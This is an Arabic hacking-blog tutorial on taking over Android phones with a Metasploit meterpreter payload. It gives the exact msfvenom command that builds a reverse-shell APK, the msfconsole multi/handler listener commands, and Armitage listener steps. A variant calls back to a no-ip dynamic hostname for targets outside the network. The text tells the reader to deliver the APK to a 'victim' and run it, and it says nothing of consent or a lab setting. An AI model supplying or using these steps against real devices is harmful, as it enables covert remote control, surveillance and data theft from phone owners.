مدونة كورتكس هكر 4 5 24
اكتب ما تود البحت عنه و اضغط Enter
معذرة، فالصفحة التي تبحث عنها في هذه المدونة ليست متوفرة.

الأحد، 13 يناير 2019

شرح اختراق الاندرويد بايلود الميتاسبلويت في كالي لينكس

سعيد

شرح اختراق الاندرويد بايلود الميتاسبلويت في كالي لينكس

اختراق الاندرويد بواسطة بايلود
سنتعرف في هذا المقال على طريقة اختراق هواتف اندرويد بواسطة مشروع الميتاسبلويت, سنستعمل ما يسمى البايلود ونتعلم كيف يتم تكوين البايلود والاختراق سواء كان داخل الشبكة باستعمال الي بي الداخلي أو الخارجي,
من المفروض أن لديك نظرة عن الاختراق بصفة عامة, وان لم يكن سأشرح بشكل بسيط كيف تتم العملية
يجب أن تعرف أن الاختراق نوعين:

  • اختراق بواسطة التروجان أو السيرفر Client/server: 
وهذا ما سنتعرف عليه في هذا المقال, وهو عن طريق ارسال سيرفر للضحية وبعدما يتم فتحه, تتم عملية الاختراق, وهذا يتم بواسطة server الذي قام بفتح باب خلفي في النظام ومن خلاله نرسل ونستقبل البيانات.
  • الاختراق المتقدم Penetration Testing :
والذي يتم عن طريق اكتشاف الثغرات ونقاط الضعف Points vulnerability بالانظمة, وهذا النوع يتطكلب الكثير من المعرفة في الهندسة العكسية والشبكات والأنظمة والبرمجة ... .

ملحوظة: 
البايلود Payload هو نفسه السيرفر server في برامج الرات RAT.

  • الأنواع المتاحه

  1. reverse_tcp
  2. reverse_http
  3. reverse_https
وتختلف فيما بينها في طريقة الاتصال (بروتوكول الاتصال tcp http https)

السيناريو بشكل عام

هو ارسال البايلود للضحية ويتم الاختراق, ثم نتحكم بالبايلود عن طريق الميتاسبلويت والذي يلعب نفس دور Client

طريقة انشاء االبايلود:


msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=4444 R > /root/Desktop/server.apk
شرح الامر:
تختار البايلود الاتي android/meterpreter/reverse_tcp وهو أنواع كثيرة, لكننا اخترنا البايلود meterpreter لانه يتحكم بالضحية بشكل كامل وأوامره كثيرة, ونوعه reverce_tcp بمعنى أن السيرفر الذي زرعناه في هاتف الضحية هو من يتصل بي (أنا الهكر), ولهذا يسمى عكسي reverse

  • البورت LPORT : وقمنا بوضع البورت 4444 أنت استبدله بأي بورت يكون مفتوح بالروتر عندك


  • LHOST : هنا تضع الايبي الخاص بجهازك, حتى يتصل بك الضحية (هو من ينشئ الاتصال)
  • لمعرفة الايبي الداخلي الخاص بك افتح الطرفية واكتب الأمر

ifconfig
ifconfig
مثلا في جهازي كما بالصورة 192.168.1.14
وهذا اسم ومسار البايلود في جهازك
/root/Desktop/server.apk 

الان تقوم بتمرير الملف الناتج server.apk الى جهاز الضحية وتشغله فيتم الاختراق
نأتي لمرحلة التحكم بالضحية
يمكننا التحكم بالضحية بطريقتين
عن طريق الاوامر CL بواسطة Metasploit أو بشكل أدق msfconsole
انسخ الأوامر بالطرفية:
msfconsole
use multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST 192.168.1.3
set LPORT 4444
exploit
الطريقة الثانية أسهل بكثير, وهي التحكم بواسطة الارميتاج Armitage وهي تعتمد على الواجهة الرسومية
تنشيء جلسة التنصت كالاتي:

  1. افتح الطرفية Terminal
  2. أكتب 

armitage
ستفتح الارميتاج
armitage
اختر Listen بمعنى تنصت
/
ثم حدد البورت والبايلود 
listener
ثم موافق STart Listener
start listener armitage
في الاخير عند اشتغال البايلود في هاتف الضحية سيضهر لك على شاشة الارميتاج
ملحوظة 
للاختراق خارج الشبكة يجب عليك استبدال الاي بي LHOST الى عنوان النو اي بي الخاص بك
مثال:
msfvenom -p android/meterpreter/reverse_tcp LHOST=cortexhacker.no-ip.biz LPORT=4444 R > /root/Desktop/server.apk
في أمان لله

شارك الموضوع عبر :

سعيد
الكاتب:

سعيد من الجزائر, مؤسس مدونة كورتكس هكر, مهتم بأمن المعلومات واختبار الاختراق وأنظمة اللينكس.

هناك تعليق واحد:

  1. سنتعرف في هذا المقال على طريقة اختراق هواتف اندرويد بواسطة مشروع الميتاسبلويت, سنستعمل ما يسمى البايلود ونتعلم كيف يتم تكوين البايلود والاختراق سواء كان داخل الشبكة باستعمال الي بي الداخلي أو الخارجي,
    من المفروض أن لديك نظرة عن الاختراق بصفة عامة, وان لم يكن سأشرح بشكل بسيط كيف تتم العملية

    ردحذف

كورتكس هكر: شروحات اللينكس واختبار الاختراق والحماية | CortexHacker
كورتكس هكر هي مدونة تهتم بطرح مواضيع اختبار الاختراق وأمن المعلومات, وطرق اكتشاف الثغرات بالبرامج والمواقع و كيفية الحماية منها, وطرق التخفي وأسرار الديب ويب وكل ما يخص الاختراق الأخلاقي
جميع الحقوق محفوظة ل كورتكس هكر | Cortex Hacker
صمم وكود بكل من طرف